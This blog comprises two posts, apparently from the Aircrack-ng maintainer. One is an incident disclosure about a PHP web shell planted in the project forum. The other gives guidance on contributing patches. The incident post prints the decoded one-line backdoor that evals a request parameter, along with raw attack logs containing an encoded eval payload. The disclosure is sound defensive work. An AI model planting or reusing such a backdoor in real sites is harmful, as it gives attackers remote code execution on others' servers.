Tuesday, May 29, 2012

Forum virus details

Hi,

as you know, I shut down the server a few days ago because I was told there was a virus. Here is what I know about it so far. This post will be updated as I know more. There is a summary at the end of this post which will be useful for your IT department.

The virus is also known by Sophos as Mal/Iframe-W and it was uploaded in the forum in a separate directory inside the forum, 'data'. It's a piece of PHP called rbvzv.php (1418 bytes) that has a payload encoded in base64. Then it is passed to the JavaScript function eval() which is going to execute it.
If any of you guys is interested in the piece of code, you can download it here (the password is rbvzv.php) and please don't use it for malicious purposes; I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it. I can read Javascript but the problem is that it's not plain Base64.

I checked the whole server and the attacker got in through the web server, no login and apache didn't have any privileges (user without bash, etc).

For those who are interested, here is the raw apache log from the attack:
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
81.30.222.42 - - [23/May/2012:20:23:26 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
116.55.19.96 - - [23/May/2012:20:24:50 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"
200.223.136.254 - - [24/May/2012:11:50:31 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/15.0.860.0"


As you can see, the file was created by that first guy, 91.224.160.132 and the timestamp (creation and last modification) of the file confirms it:
-rw-r--r-- 1 USER GROUP 1418 2012-05-23 01:12 rbvzv.php

I have to thank @SwissHttp on twitter for decoding it and here is the result (PHP):
if(isset($_REQUEST['a'.'s'.'c']))eval(stripslashes($_REQUEST['a'.'s'.'c']));


Basically, it executes what is passed in the parameter 'asc' (and strips slashes) and you can see an example use on the last line of the Apache log posted above. I'll see if I can get my hands on the complete request and not just part of it.

Unfortunately, I don't think I can do anything against those guys (besides talking about it), a whois on that IP address looks like it's a shady business (Bergdorf Group Ltd): IP in the Netherlands but the person to contact lives in the Virgin Islands. Anyway, I sent them an email. I got an answer this morning (May 30) asking for some more information that I just provided. We'll see how it goes.

As far as I know, it is limited to the forum and nothing else. The attacker didn't get on the server or installed any backdoor.

So here is what I'm gonna do next: I'll check the forum database to see if they tried anything else against the forum (and check the apache logs to see if there is any other mention of those IP addresses). I want to know how it happened exactly and when.
The forum is probably going to stay down for another week, I want to migrate it to another server and I need to make sure everything works properly and the new DNS are propagated.


So, to summarize: it happened a day before I got the email letting me know there is a virus. It happened May 22 at 23h12 (11.12pm) GMT/UTC and I stopped it on May 24, around 14h00 (2pm) GMT/UTC.
I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it.

Thursday, May 10, 2012

How to contribute?

I got an email asking how to contribute to Aircrack-ng. He was telling me that he did not find any information about it.

He was right, there was nothing written yet; it's kinda implicit but let's address that.

So, first of all, make sure to work on the latest subversion revision and make your modifications in it. Don't remove the subversion control directory (.svn) and files.

About the code, it MUST be GPL or GPLv2 and allow OpenSSL exception (see the license exception in every single source code file).
You can add comment to your diff file at the top, before the line beginning with +++. It is displayed by trac (and you can easily read them) but the advantage is that it is ignored by patch when applying the patch. Make it clear in that section that your patch is GPL or GPLv2 and allow OpenSSL exception.

Another thing about the code: make sure that your code is easy to read and well commented. I'm talking about smart comments and documenting code that is not obvious. I found a post about it and he uses Javascript but it applies to every other language.
Ah yeah, don't address several issues with a single patch. One patch = one issue.

Once you're done, you have to create a difference (or a patch, that's the same thing). Thanks to subversion, it is very easy to do: just issue 'svn diff > PATCH_FILE.diff' and you're done.
Important note: If your changes added files, make sure to do a 'svn add' for each of them. If you don't do it, the added files won't be included in the patch.

Once you're done all that, you can create a new ticket on our trac, fill all the fields (if you are not sure how to fill some of them, don't worry, I'll do it) and attach the patch. If you have any issue doing so, feel free to shoot me an email with all the details, I'll post it.
If you have several patches and they need to be applied in a specific order (affecting the same file), add a number in front of the name of the patch so that I know how to apply them or explain the order of the patches in the ticket.

That's it :)

If you have other questions, post them in the comments, and I'll update this post to address them.